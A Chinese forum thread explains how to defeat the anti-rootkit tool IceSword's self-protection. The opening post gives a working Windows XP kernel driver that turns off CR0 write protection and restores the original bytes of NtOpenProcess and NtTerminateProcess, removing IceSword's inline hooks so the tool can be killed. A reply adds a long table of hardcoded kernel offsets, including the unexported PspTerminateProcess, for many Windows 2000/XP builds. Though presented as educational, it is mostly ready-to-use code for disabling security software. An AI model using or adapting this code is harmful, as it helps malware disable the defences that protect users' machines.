|
阅读:12628回复:44
突破IceSword自身的进程保护 [ 2006/12/17 17:19 | by xyzreg ]
IceSword的驱动对其自身进程做了保护,使恶意程序终止不了他。IceSword没有用HOOK SSDT的方法,不过也没用什么太BT的方法,而是Inline Hook了NtOpenProcess、NtTerminateProcess几个函数,即修改函数前5个字节,jmp到他自定义处理函数例程里。
终止采用这类保护方法的进程,可以使用暴力的PspTerminateProcess方法,PspTerminateProcess函数未导出,需要我们自己穷举特征码搜索来定位,或者硬编码之。当然,我们还可以恢复IceSword的Inline hook,还原被IceSword挂钩过的NtOpenProcess、NtTerminateProcess函数,然后在用户态上使用普通的终止进程的方法就可以终止他了。这里给出了第二中方法的具体代码,不过由于此篇文章出于科普目的,代码就写得马虎点了,仅适用于Windows XP,因为取SSDT对应的函数索引号用的硬编码,说明问题而已。NtTerminateProcess未导出,大家可以自己改成通过读取ntdll.dll动态通用的获得索引号的方法,方法网上有公开,需要的人就自己动点手吧,呵呵~ #include <ntddk.h> #define DWORD unsigned long unsigned char OldCode[5]="\x68\xc4\x00\x00\x00"; unsigned char OldCode2[5]="\x8b\xff\x55\x8b\xec"; #pragma pack(1) typedef struct ServiceDescriptorEntry { unsigned int *ServiceTableBase; unsigned int *ServiceCounterTableBase; unsigned int NumberOfServices; unsigned char *ParamTableBase; } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; #pragma pack() __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) { DWORD OpAddr,OpAddr2; OpAddr=*(KeServiceDescriptorTable.ServiceTableBase + 0x7A); OpAddr2=*(KeServiceDescriptorTable.ServiceTableBase + 0x101); _asm { CLI MOV eax, CR0 AND eax, NOT 10000H MOV CR0, eax pushad mov edi, OpAddr mov eax, dword ptr OldCode[0] mov [edi], eax mov al, byte ptr OldCode[4] mov [edi+4], al mov edi, OpAddr2 mov eax, dword ptr OldCode2[0] mov [edi], eax mov al, byte ptr OldCode2[4] mov [edi+4], al popad MOV eax, CR0 OR eax, 10000H MOV CR0, eax STI } return STATUS_SUCCESS; } |
|
|
|
沙发#
发布于:2007-01-12 09:50
哎,搜索法在多平台上问题太多了
 |
|
|
|
板凳#
发布于:2007-01-12 09:57
这文章网上一大把,关键是PspTerminateProcess这种方法没有看到具体怎么弄。好不容易找到reactos及psdelete的关系太复杂了,一时半会儿弄不清楚头绪。穷举特征码搜索来定位,或者硬编码也许才是贴出这篇文章应该解决的哦。不过还是谢谢了
|
|
驱动小牛
|
地板#
发布于:2007-01-12 10:59
不错.
|
|
地下室#
发布于:2007-01-12 13:25
希望不要被病毒/木马作者利用
|
|
|
5楼#
发布于:2007-01-12 18:50
看到了就再往深层HOOK,反正前面的路还长着呢......
|
|
|
|
6楼#
发布于:2007-01-12 19:30
引用第2楼tohide于2007-01-12 09:57发表的“”: 给你这个吧, PspTerminateProcess的硬编码~ 基本够用了 /*******************************************/ /* Internal data */ /*******************************************/ static NTUNDOC_OSVERSION g_aOsVersion[] = { { TEXT("ntkrnlpa 5.00.2195.1 (polish)"), TEXT("384D5A86189E80"), { .NtCreateProcess = (void*) 0x000DEE96, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000C6DCA, .NtTerminateProcess = (void*) 0x000DFCA6, .NtQueryInformationFile = (void*) 0x000A685A, .NtQueryKey = (void*) 0x0010EB36, .NtQueryValueKey = (void*) 0x0010EDCC, .NtSetInformationFile = (void*) 0x000A6EA8, .NtSetValueKey = (void*) 0x0010F45E, .ObpFreeObject = (void*) 0x000D548E, .PspTerminateProcess = (void*) 0x000DFE28, .swprintf = (void*) 0x0005EC20, .ZwOpenProcess = (void*) 0x0002E094, .ZwProtectVirtualMemory = (void*) 0x0002E164, .ZwReadVirtualMemory = (void*) 0x0002E434, } }, { TEXT("ntoskrnl 5.00.2195.1 (polish)"), TEXT("384D9B17190F40"), { .NtCreateProcess = (void*) 0x000AD948, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000AEFF6, .NtTerminateProcess = (void*) 0x000A2FAC, .NtQueryInformationFile = (void*) 0x000AE525, .NtQueryKey = (void*) 0x0009923A, .NtQueryValueKey = (void*) 0x0009A077, .NtSetInformationFile = (void*) 0x000C1308, .NtSetValueKey = (void*) 0x000B8D90, .ObpFreeObject = (void*) 0x00095B7F, .PspTerminateProcess = (void*) 0x000FB3EB, .swprintf = (void*) 0x0005DEE2, .ZwOpenProcess = (void*) 0x00000E5A, .ZwProtectVirtualMemory = (void*) 0x00000F2A, .ZwReadVirtualMemory = (void*) 0x000011FA, } }, { TEXT("ntkrnlpa 5.00.2195.6717"), TEXT("3EE650C919E740"), { .NtCreateProcess = (void*) 0x000E29A6, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000C9F3E, .NtTerminateProcess = (void*) 0x000E3A0E, .NtQueryInformationFile = (void*) 0x000A9DD6, .NtQueryKey = (void*) 0x001133AC, .NtQueryValueKey = (void*) 0x00113642, .NtSetInformationFile = (void*) 0x000AA424, .NtSetValueKey = (void*) 0x00113CD4, .ObpFreeObject = (void*) 0x000D8A1E, .PspTerminateProcess = (void*) 0x000E3B90, .swprintf = (void*) 0x00062890, .ZwOpenProcess = (void*) 0x0002EA60, .ZwProtectVirtualMemory = (void*) 0x0002EB30, .ZwReadVirtualMemory = (void*) 0x0002EE00, } }, { TEXT("ntoskrnl 5.00.2195.6717"), TEXT("3EE6C0021A47C0"), { .NtCreateProcess = (void*) 0x000A9212, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x0009F7F1, .NtTerminateProcess = (void*) 0x000A9BF3, .NtQueryInformationFile = (void*) 0x000987C1, .NtQueryKey = (void*) 0x000B2FC0, .NtQueryValueKey = (void*) 0x000B3138, .NtSetInformationFile = (void*) 0x00098C08, .NtSetValueKey = (void*) 0x000B32F4, .ObpFreeObject = (void*) 0x000A6852, .PspTerminateProcess = (void*) 0x000FBDBA, .swprintf = (void*) 0x00061E42, .ZwOpenProcess = (void*) 0x00000EDA, .ZwProtectVirtualMemory = (void*) 0x00000FAA, .ZwReadVirtualMemory = (void*) 0x0000127A, } }, { TEXT("ntkrnlpa 5.00.2195.7045 (1)"), TEXT("427B58D31A2D40"), { .NtCreateProcess = (void*) 0x000E620C, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CEB84, .NtTerminateProcess = (void*) 0x000E7274, .NtQueryInformationFile = (void*) 0x000AC5F2, .NtQueryKey = (void*) 0x0011760C, .NtQueryValueKey = (void*) 0x001178A2, .NtSetInformationFile = (void*) 0x000ACC78, .NtSetValueKey = (void*) 0x00117F34, .ObpFreeObject = (void*) 0x000DBC98, .PspTerminateProcess = (void*) 0x000E73F6, .swprintf = (void*) 0x000646F0, .ZwOpenProcess = (void*) 0x0002FF24, .ZwProtectVirtualMemory = (void*) 0x0002FFF4, .ZwReadVirtualMemory = (void*) 0x000302C4, } }, { TEXT("ntkrnlpa 5.00.2195.7045 (2)"), TEXT("427B58D31C7C00"), { .NtCreateProcess = (void*) 0x000E620C, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CEB84, .NtTerminateProcess = (void*) 0x000E7274, .NtQueryInformationFile = (void*) 0x000AC5F2, .NtQueryKey = (void*) 0x0011760C, .NtQueryValueKey = (void*) 0x001178A2, .NtSetInformationFile = (void*) 0x000ACC78, .NtSetValueKey = (void*) 0x00117F34, .ObpFreeObject = (void*) 0x000DBC98, .PspTerminateProcess = (void*) 0x000E73F6, .swprintf = (void*) 0x000646F0, .ZwOpenProcess = (void*) 0x0002FF24, .ZwProtectVirtualMemory = (void*) 0x0002FFF4, .ZwReadVirtualMemory = (void*) 0x000302C4, } }, { TEXT("ntoskrnl 5.00.2195.7045 (1)"), TEXT("427B58BB19D400"), { .NtCreateProcess = (void*) 0x000E20BE, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CAF6C, .NtTerminateProcess = (void*) 0x000E3126, .NtQueryInformationFile = (void*) 0x000A8B72, .NtQueryKey = (void*) 0x001134BE, .NtQueryValueKey = (void*) 0x00113754, .NtSetInformationFile = (void*) 0x000A91F8, .NtSetValueKey = (void*) 0x00113DE6, .ObpFreeObject = (void*) 0x000D7B4A, .PspTerminateProcess = (void*) 0x000E32A8, .swprintf = (void*) 0x00061450, .ZwOpenProcess = (void*) 0x0002FEF4, .ZwProtectVirtualMemory = (void*) 0x0002FFC4, .ZwReadVirtualMemory = (void*) 0x00030294, } }, { TEXT("ntoskrnl 5.00.2195.7045 (2)"), TEXT("427B58BB1C22C0"), { .NtCreateProcess = (void*) 0x000E20BE, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CAF6C, .NtTerminateProcess = (void*) 0x000E3126, .NtQueryInformationFile = (void*) 0x000A8B72, .NtQueryKey = (void*) 0x001134BE, .NtQueryValueKey = (void*) 0x00113754, .NtSetInformationFile = (void*) 0x000A91F8, .NtSetValueKey = (void*) 0x00113DE6, .ObpFreeObject = (void*) 0x000D7B4A, .PspTerminateProcess = (void*) 0x000E32A8, .swprintf = (void*) 0x00061450, .ZwOpenProcess = (void*) 0x0002FEF4, .ZwProtectVirtualMemory = (void*) 0x0002FFC4, .ZwReadVirtualMemory = (void*) 0x00030294, } }, { TEXT("ntkrpamp 5.00.2195.7098"), TEXT("4492581F1A7C80"), { .NtCreateProcess = (void*) 0x000EA984, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000D326A, .NtTerminateProcess = (void*) 0x000EB9EE, .NtQueryInformationFile = (void*) 0x000B0D78, .NtQueryKey = (void*) 0x0011BDD8, .NtQueryValueKey = (void*) 0x0011C06E, .NtSetInformationFile = (void*) 0x000B13F0, .NtSetValueKey = (void*) 0x0011C700, .ObpFreeObject = (void*) 0x000E0408, .PspTerminateProcess = (void*) 0x000EBB70, .swprintf = (void*) 0x00067290, .ZwOpenProcess = (void*) 0x00031C50, .ZwProtectVirtualMemory = (void*) 0x00031D20, .ZwReadVirtualMemory = (void*) 0x00031FF0, } }, { TEXT("ntkrnlpa 5.00.2195.7098 (english)"), TEXT("4492581F1A2580"), { .NtCreateProcess = (void*) 0x000E6346, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CECB2, .NtTerminateProcess = (void*) 0x000E73AE, .NtQueryInformationFile = (void*) 0x000AC72E, .NtQueryKey = (void*) 0x00117744, .NtQueryValueKey = (void*) 0x001179DA, .NtSetInformationFile = (void*) 0x000ACDB4, .NtSetValueKey = (void*) 0x0011806C, .ObpFreeObject = (void*) 0x000DBDCA, .PspTerminateProcess = (void*) 0x000E7530, .swprintf = (void*) 0x00064770, .ZwOpenProcess = (void*) 0x0002FF30, .ZwProtectVirtualMemory = (void*) 0x00030000, .ZwReadVirtualMemory = (void*) 0x000302D0, } }, { TEXT("ntkrnlpa 5.00.2195.7098 (italian)"), TEXT("4492581F1C7D00"), { .NtCreateProcess = (void*) 0x000E6346, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CECB2, .NtTerminateProcess = (void*) 0x000E73AE, .NtQueryInformationFile = (void*) 0x000AC72E, .NtQueryKey = (void*) 0x00117744, .NtQueryValueKey = (void*) 0x001179DA, .NtSetInformationFile = (void*) 0x000ACDB4, .NtSetValueKey = (void*) 0x0011806C, .ObpFreeObject = (void*) 0x000DBDCA, .PspTerminateProcess = (void*) 0x000E7530, .swprintf = (void*) 0x00064770, .ZwOpenProcess = (void*) 0x0002FF30, .ZwProtectVirtualMemory = (void*) 0x00030000, .ZwReadVirtualMemory = (void*) 0x000302D0, } }, { TEXT("ntoskrnl 5.00.2195.7098 (english)"), TEXT("4492580919CD00"), { .NtCreateProcess = (void*) 0x000E2264, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CB10E, .NtTerminateProcess = (void*) 0x000E32CC, .NtQueryInformationFile = (void*) 0x000A8D2E, .NtQueryKey = (void*) 0x0011366E, .NtQueryValueKey = (void*) 0x00113904, .NtSetInformationFile = (void*) 0x000A93B4, .NtSetValueKey = (void*) 0x00113F96, .ObpFreeObject = (void*) 0x000D7CE8, .PspTerminateProcess = (void*) 0x000E344E, .swprintf = (void*) 0x000614D0, .ZwOpenProcess = (void*) 0x0002FF04, .ZwProtectVirtualMemory = (void*) 0x0002FFD4, .ZwReadVirtualMemory = (void*) 0x000302A4, } }, { TEXT("ntoskrnl 5.00.2195.7098 (italian)"), TEXT("449258091C2480"), { .NtCreateProcess = (void*) 0x000E2264, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CB10E, .NtTerminateProcess = (void*) 0x000E32CC, .NtQueryInformationFile = (void*) 0x000A8D2E, .NtQueryKey = (void*) 0x0011366E, .NtQueryValueKey = (void*) 0x00113904, .NtSetInformationFile = (void*) 0x000A93B4, .NtSetValueKey = (void*) 0x00113F96, .ObpFreeObject = (void*) 0x000D7CE8, .PspTerminateProcess = (void*) 0x000E344E, .swprintf = (void*) 0x000614D0, .ZwOpenProcess = (void*) 0x0002FF04, .ZwProtectVirtualMemory = (void*) 0x0002FFD4, .ZwReadVirtualMemory = (void*) 0x000302A4, } }, { TEXT("ntkrnlmp 5.00.2195.7098"), TEXT("449258091A2940"), { .NtCreateProcess = (void*) 0x000E6C02, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CFA40, .NtTerminateProcess = (void*) 0x000E7C6C, .NtQueryInformationFile = (void*) 0x000AD6B8, .NtQueryKey = (void*) 0x00118056, .NtQueryValueKey = (void*) 0x001182EC, .NtSetInformationFile = (void*) 0x000ADD30, .NtSetValueKey = (void*) 0x0011897E, .ObpFreeObject = (void*) 0x000DC686, .PspTerminateProcess = (void*) 0x000E7DEE, .swprintf = (void*) 0x00064300, .ZwOpenProcess = (void*) 0x00031B20, .ZwProtectVirtualMemory = (void*) 0x00031BF0, .ZwReadVirtualMemory = (void*) 0x00031EC0, } }, { TEXT("ntkrnlpa 5.00.2195.7111"), TEXT("45069E861C7D00"), { .NtCreateProcess = (void*) 0x000E6346, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CECB2, .NtTerminateProcess = (void*) 0x000E73AE, .NtQueryInformationFile = (void*) 0x000AC72E, .NtQueryKey = (void*) 0x00117748, .NtQueryValueKey = (void*) 0x001179DE, .NtSetInformationFile = (void*) 0x000ACDB4, .NtSetValueKey = (void*) 0x00118070, .ObpFreeObject = (void*) 0x000DBDCA, .PspTerminateProcess = (void*) 0x000E7530, .swprintf = (void*) 0x00064770, .ZwOpenProcess = (void*) 0x0002FF30, .ZwProtectVirtualMemory = (void*) 0x00030000, .ZwReadVirtualMemory = (void*) 0x000302D0, } }, { TEXT("ntoskrnl 5.00.2195.7111"), TEXT("45069E6E1C2480"), { .NtCreateProcess = (void*) 0x000E2264, .NtCreateProcessEx = NULL, .NtCreateSection = (void*) 0x000CB10E, .NtTerminateProcess = (void*) 0x000E32CC, .NtQueryInformationFile = (void*) 0x000A8D2E, .NtQueryKey = (void*) 0x00113672, .NtQueryValueKey = (void*) 0x00113908, .NtSetInformationFile = (void*) 0x000A93B4, .NtSetValueKey = (void*) 0x00113F9A, .ObpFreeObject = (void*) 0x000D7CE8, .PspTerminateProcess = (void*) 0x000E344E, .swprintf = (void*) 0x000614D0, .ZwOpenProcess = (void*) 0x0002FF00, .ZwProtectVirtualMemory = (void*) 0x0002FFD0, .ZwReadVirtualMemory = (void*) 0x000302A0, } }, { TEXT("ntkrnlpa 5.1.2600.0 (xpclient.010817-1148)"), TEXT("0ABB7E73C24942C6A610FDB19159E3CC1"), { .NtCreateProcess = (void*) 0x000D90DE, .NtCreateProcessEx = (void*) 0x000D9036, .NtCreateSection = (void*) 0x000B36D0, .NtTerminateProcess = (void*) 0x000DA28C, .NtQueryInformationFile = (void*) 0x00086096, .NtQueryKey = (void*) 0x00127F7E, .NtQueryValueKey = (void*) 0x00124D76, .NtSetInformationFile = (void*) 0x00086686, .NtSetValueKey = (void*) 0x0012533A, .ObpFreeObject = (void*) 0x000C9708, .PspTerminateProcess = (void*) 0x000DA3FE, .swprintf = (void*) 0x00056070, .ZwOpenProcess = (void*) 0x000241D8, .ZwProtectVirtualMemory = (void*) 0x00024304, .ZwReadVirtualMemory = (void*) 0x000246D8, } }, { TEXT("ntoskrnl 5.1.2600.0 (xpclient.010817-1148)"), TEXT("DA37FCA19A614EB98EE2A3CF30E625392"), { .NtCreateProcess = (void*) 0x000CA61D, .NtCreateProcessEx = (void*) 0x000B0346, .NtCreateSection = (void*) 0x000A11D5, .NtTerminateProcess = (void*) 0x0009C6DC, .NtQueryInformationFile = (void*) 0x000A6210, .NtQueryKey = (void*) 0x0008B86B, .NtQueryValueKey = (void*) 0x000A5D81, .NtSetInformationFile = (void*) 0x000B181D, .NtSetValueKey = (void*) 0x00093215, .ObpFreeObject = (void*) 0x000A0975, .PspTerminateProcess = (void*) 0x00136477, .swprintf = (void*) 0x00021D42, .ZwOpenProcess = (void*) 0x0003B7EE, .ZwProtectVirtualMemory = (void*) 0x0003B91A, .ZwReadVirtualMemory = (void*) 0x0003BCEE, } }, { TEXT("ntkrnlpa 5.1.2600.31 (xpclnt_qfe.010827-1803)"), TEXT("80423993DFF1461BB91D5B2FF59D15604"), { .NtCreateProcess = (void*) 0x000D9934, .NtCreateProcessEx = (void*) 0x000D988C, .NtCreateSection = (void*) 0x000B3E3A, .NtTerminateProcess = (void*) 0x000DAAF0, .NtQueryInformationFile = (void*) 0x0008680A, .NtQueryKey = (void*) 0x001283B2, .NtQueryValueKey = (void*) 0x001251AA, .NtSetInformationFile = (void*) 0x00086DFA, .NtSetValueKey = (void*) 0x0012576E, .ObpFreeObject = (void*) 0x000C9F5E, .PspTerminateProcess = (void*) 0x000DAC62, .swprintf = (void*) 0x000560B0, .ZwOpenProcess = (void*) 0x00024208, .ZwProtectVirtualMemory = (void*) 0x00024334, .ZwReadVirtualMemory = (void*) 0x00024708, } }, { TEXT("ntoskrnl 5.1.2600.31 (xpclnt_qfe.010827-1803)"), TEXT("A6C32BE0B0FD4CE7B42CF7C11D3214FC4"), { .NtCreateProcess = (void*) 0x000D40C2, .NtCreateProcessEx = (void*) 0x000D401A, .NtCreateSection = (void*) 0x000AF04E, .NtTerminateProcess = (void*) 0x000D5262, .NtQueryInformationFile = (void*) 0x00081B8C, .NtQueryKey = (void*) 0x00122B38, .NtQueryValueKey = (void*) 0x0011F930, .NtSetInformationFile = (void*) 0x0008217C, .NtSetValueKey = (void*) 0x0011FEF4, .ObpFreeObject = (void*) 0x000C46F4, .PspTerminateProcess = (void*) 0x000D53D4, .swprintf = (void*) 0x000532E0, .ZwOpenProcess = (void*) 0x00024168, .ZwProtectVirtualMemory = (void*) 0x00024294, .ZwReadVirtualMemory = (void*) 0x00024668, } }, { TEXT("ntkrnlpa 5.1.2600.34 (xpclnt_qfe.010827-1803)"), TEXT("80423993DFF1461BB91D5B2FF59D15607"), { .NtCreateProcess = (void*) 0x000D9834, .NtCreateProcessEx = (void*) 0x000D978C, .NtCreateSection = (void*) 0x000B3D42, .NtTerminateProcess = (void*) 0x000DA9D4, .NtQueryInformationFile = (void*) 0x0008670C, .NtQueryKey = (void*) 0x001282BA, .NtQueryValueKey = (void*) 0x001250B2, .NtSetInformationFile = (void*) 0x00086CFC, .NtSetValueKey = (void*) 0x00125676, .ObpFreeObject = (void*) 0x000C9E66, .PspTerminateProcess = (void*) 0x000DAB46, .swprintf = (void*) 0x000560B0, .ZwOpenProcess = (void*) 0x00024208, .ZwProtectVirtualMemory = (void*) 0x00024334, .ZwReadVirtualMemory = (void*) 0x00024708, } }, { TEXT("ntoskrnl 5.1.2600.34 (xpclnt_qfe.010827-1803)"), TEXT("A6C32BE0B0FD4CE7B42CF7C11D3214FC7"), { .NtCreateProcess = (void*) 0x000D404A, .NtCreateProcessEx = (void*) 0x000D3FA2, .NtCreateSection = (void*) 0x000AEFCA, .NtTerminateProcess = (void*) 0x000D51EA, .NtQueryInformationFile = (void*) 0x00081B08, .NtQueryKey = (void*) 0x00122ABA, .NtQueryValueKey = (void*) 0x0011F8B2, .NtSetInformationFile = (void*) 0x000820F8, .NtSetValueKey = (void*) 0x0011FE76, .ObpFreeObject = (void*) 0x000C4670, .PspTerminateProcess = (void*) 0x000D535C, .swprintf = (void*) 0x000532E0, .ZwOpenProcess = (void*) 0x00024168, .ZwProtectVirtualMemory = (void*) 0x00024294, .ZwReadVirtualMemory = (void*) 0x00024668, } }, { TEXT("ntkrnlpa 5.1.2600.115 (xpclnt_qfe.021108-2107)"), TEXT("E086B943FAE142BEBD7E5F280ADF14587"), { .NtCreateProcess = (void*) 0x000D97D4, .NtCreateProcessEx = (void*) 0x000D972C, .NtCreateSection = (void*) 0x000B3CF6, .NtTerminateProcess = (void*) 0x000DA974, .NtQueryInformationFile = (void*) 0x0008670C, .NtQueryKey = (void*) 0x0012822A, .NtQueryValueKey = (void*) 0x00125022, .NtSetInformationFile = (void*) 0x00086CFC, .NtSetValueKey = (void*) 0x001255E6, .ObpFreeObject = (void*) 0x000C9E1A, .PspTerminateProcess = (void*) 0x000DAAE6, .swprintf = (void*) 0x000560A0, .ZwOpenProcess = (void*) 0x000241B0, .ZwProtectVirtualMemory = (void*) 0x000242DC, .ZwReadVirtualMemory = (void*) 0x000246B0, } }, { TEXT("ntoskrnl 5.1.2600.115 (xpclnt_qfe.021108-2107)"), TEXT("15317AB7420A427FB0CD6DEFE09530A37"), { .NtCreateProcess = (void*) 0x000D4062, .NtCreateProcessEx = (void*) 0x000D3FBA, .NtCreateSection = (void*) 0x000AF006, .NtTerminateProcess = (void*) 0x000D5210, .NtQueryInformationFile = (void*) 0x00081B94, .NtQueryKey = (void*) 0x00122AAA, .NtQueryValueKey = (void*) 0x0011F8A2, .NtSetInformationFile = (void*) 0x00082184, .NtSetValueKey = (void*) 0x0011FE66, .ObpFreeObject = (void*) 0x000C46AC, .PspTerminateProcess = (void*) 0x000D5382, .swprintf = (void*) 0x00053320, .ZwOpenProcess = (void*) 0x00024128, .ZwProtectVirtualMemory = (void*) 0x00024254, .ZwReadVirtualMemory = (void*) 0x00024628, } }, { TEXT("ntkrnlpa 5.1.2600.1106 (xpsp1.020828-1920)"), TEXT("EBC8148525684CCEBF8D3491B68F67211"), { .NtCreateProcess = (void*) 0x000DCD3C, .NtCreateProcessEx = (void*) 0x000DCC94, .NtCreateSection = (void*) 0x000B6D42, .NtTerminateProcess = (void*) 0x000DE3A6, .NtQueryInformationFile = (void*) 0x0008909A, .NtQueryKey = (void*) 0x0012BAC6, .NtQueryValueKey = (void*) 0x001288C0, .NtSetInformationFile = (void*) 0x0008968A, .NtSetValueKey = (void*) 0x00128E84, .ObpFreeObject = (void*) 0x000CD280, .PspTerminateProcess = (void*) 0x000DE518, .swprintf = (void*) 0x00057350, .ZwOpenProcess = (void*) 0x00024C84, .ZwProtectVirtualMemory = (void*) 0x00024DB0, .ZwReadVirtualMemory = (void*) 0x00025184, } }, { TEXT("ntoskrnl 5.1.2600.1106 (xpsp1.020828-1920)"), TEXT("C95EC79CFBFB4220AF2B6E9D09551A1F2"), { .NtCreateProcess = (void*) 0x000DA8B3, .NtCreateProcessEx = (void*) 0x000BC950, .NtCreateSection = (void*) 0x000ABB92, .NtTerminateProcess = (void*) 0x000BDC32, .NtQueryInformationFile = (void*) 0x000B0514, .NtQueryKey = (void*) 0x0009F460, .NtQueryValueKey = (void*) 0x000AF3FB, .NtSetInformationFile = (void*) 0x000BE589, .NtSetValueKey = (void*) 0x0009E2DC, .ObpFreeObject = (void*) 0x000AB072, .PspTerminateProcess = (void*) 0x000F1EC6, .swprintf = (void*) 0x00023783, .ZwOpenProcess = (void*) 0x0003B280, .ZwProtectVirtualMemory = (void*) 0x0003B348, .ZwReadVirtualMemory = (void*) 0x00064F44, } }, { TEXT("ntkrnlpa 5.1.2600.1149 (xpsp2.021108-1929)"), TEXT("6DE07FC8872C47D5B22D20387B7F44275"), { .NtCreateProcess = (void*) 0x000DCE96, .NtCreateProcessEx = (void*) 0x000DCDEE, .NtCreateSection = (void*) 0x000B6EC2, .NtTerminateProcess = (void*) 0x000DE500, .NtQueryInformationFile = (void*) 0x0008921A, .NtQueryKey = (void*) 0x0012BC34, .NtQueryValueKey = (void*) 0x00128A2E, .NtSetInformationFile = (void*) 0x0008980A, .NtSetValueKey = (void*) 0x00128FF2, .ObpFreeObject = (void*) 0x000CD400, .PspTerminateProcess = (void*) 0x000DE672, .swprintf = (void*) 0x000574D0, .ZwOpenProcess = (void*) 0x00024DA4, .ZwProtectVirtualMemory = (void*) 0x00024ED0, .ZwReadVirtualMemory = (void*) 0x000252A4, } }, { TEXT("ntoskrnl 5.1.2600.1149 (xpsp2.021108-1929)"), TEXT("31EE89B5DDB24922BB190478A63817EF5"), { .NtCreateProcess = (void*) 0x000D70E0, .NtCreateProcessEx = (void*) 0x000D7038, .NtCreateSection = (void*) 0x000B1CB0, .NtTerminateProcess = (void*) 0x000D874A, .NtQueryInformationFile = (void*) 0x0008421A, .NtQueryKey = (void*) 0x00125E6C, .NtQueryValueKey = (void*) 0x00122C66, .NtSetInformationFile = (void*) 0x0008480A, .NtSetValueKey = (void*) 0x0012322A, .ObpFreeObject = (void*) 0x000C7642, .PspTerminateProcess = (void*) 0x000D88BC, .swprintf = (void*) 0x000542C0, .ZwOpenProcess = (void*) 0x00024CEC, .ZwProtectVirtualMemory = (void*) 0x00024E18, .ZwReadVirtualMemory = (void*) 0x000251EC, } }, { TEXT("ntkrnlpa 5.1.2600.1151 (xpsp2.030422-1633)"), TEXT("2080ED7B99A74CD9B8A12C69A916BE483"), { .NtCreateProcess = (void*) 0x000DD23C, .NtCreateProcessEx = (void*) 0x000DD194, .NtCreateSection = (void*) 0x000B70C8, .NtTerminateProcess = (void*) 0x000DE8A6, .NtQueryInformationFile = (void*) 0x0008941A, .NtQueryKey = (void*) 0x0012BFDA, .NtQueryValueKey = (void*) 0x00128DD4, .NtSetInformationFile = (void*) 0x00089A0A, .NtSetValueKey = (void*) 0x00129398, .ObpFreeObject = (void*) 0x000CD676, .PspTerminateProcess = (void*) 0x000DEA18, .swprintf = (void*) 0x000575F0, .ZwOpenProcess = (void*) 0x00024E14, .ZwProtectVirtualMemory = (void*) 0x00024F40, .ZwReadVirtualMemory = (void*) 0x00025314, } }, { TEXT("ntoskrnl 5.1.2600.1151 (xpsp2.030422-1633)"), TEXT("FB1EDACE71FB4812A5D5132819D72E523"), { .NtCreateProcess = (void*) 0x000D7486, .NtCreateProcessEx = (void*) 0x000D73DE, .NtCreateSection = (void*) 0x000B1EB6, .NtTerminateProcess = (void*) 0x000D8AF0, .NtQueryInformationFile = (void*) 0x0008441A, .NtQueryKey = (void*) 0x00126212, .NtQueryValueKey = (void*) 0x0012300C, .NtSetInformationFile = (void*) 0x00084A0A, .NtSetValueKey = (void*) 0x001235D0, .ObpFreeObject = (void*) 0x000C78B8, .PspTerminateProcess = (void*) 0x000D8C62, .swprintf = (void*) 0x000543E0, .ZwOpenProcess = (void*) 0x00024D98, .ZwProtectVirtualMemory = (void*) 0x00024EC4, .ZwReadVirtualMemory = (void*) 0x00025298, } }, { TEXT("ntkrnlpa 5.1.2600.1634 (xpsp2.050301-1526)"), TEXT("4F10E20499CD454DA4E958DC6B7DC6151"), { .NtCreateProcess = (void*) 0x000DE466, .NtCreateProcessEx = (void*) 0x000DE3BE, .NtCreateSection = (void*) 0x000B8058, .NtTerminateProcess = (void*) 0x000DFAC2, .NtQueryInformationFile = (void*) 0x0008A43E, .NtQueryKey = (void*) 0x0012D52A, .NtQueryValueKey = (void*) 0x0012A324, .NtSetInformationFile = (void*) 0x0008AA2E, .NtSetValueKey = (void*) 0x0012A8E8, .ObpFreeObject = (void*) 0x000CE6D4, .PspTerminateProcess = (void*) 0x000DFC34, .swprintf = (void*) 0x00058560, .ZwOpenProcess = (void*) 0x000251F0, .ZwProtectVirtualMemory = (void*) 0x0002531C, .ZwReadVirtualMemory = (void*) 0x000256F0, } }, { TEXT("ntoskrnl 5.1.2600.1634 (xpsp2.050301-1526)"), TEXT("8C0365A4579D46469E0B53A80062C0472"), { .NtCreateProcess = (void*) 0x000D3DCD, .NtCreateProcessEx = (void*) 0x000A0107, .NtCreateSection = (void*) 0x0007ECC9, .NtTerminateProcess = (void*) 0x000A156E, .NtQueryInformationFile = (void*) 0x000932EE, .NtQueryKey = (void*) 0x00096734, .NtQueryValueKey = (void*) 0x0008A214, .NtSetInformationFile = (void*) 0x00087FCF, .NtSetValueKey = (void*) 0x000A5C94, .ObpFreeObject = (void*) 0x0007D9A5, .PspTerminateProcess = (void*) 0x000F779C, .swprintf = (void*) 0x0001F96F, .ZwOpenProcess = (void*) 0x00005682, .ZwProtectVirtualMemory = (void*) 0x000057AE, .ZwReadVirtualMemory = (void*) 0x00005B82, } }, { TEXT("ntkrnlpa 5.1.2600.2096 (xpsp_sp2_rc1.040311-2315)"), TEXT("3FD0C106E6C64D489CB5408DE20BB2A31"), { .NtCreateProcess = (void*) 0x000EDFAC, .NtCreateProcessEx = (void*) 0x000EDEF6, .NtCreateSection = (void*) 0x000C7116, .NtTerminateProcess = (void*) 0x000EF774, .NtQueryInformationFile = (void*) 0x00096A02, .NtQueryKey = (void*) 0x00142206, .NtQueryValueKey = (void*) 0x0013EC46, .NtSetInformationFile = (void*) 0x00097006, .NtSetValueKey = (void*) 0x0013F24C, .ObpFreeObject = (void*) 0x000DD502, .PspTerminateProcess = (void*) 0x000EF8EE, .swprintf = (void*) 0x0005ED65, .ZwOpenProcess = (void*) 0x000269E8, .ZwProtectVirtualMemory = (void*) 0x00026B14, .ZwReadVirtualMemory = (void*) 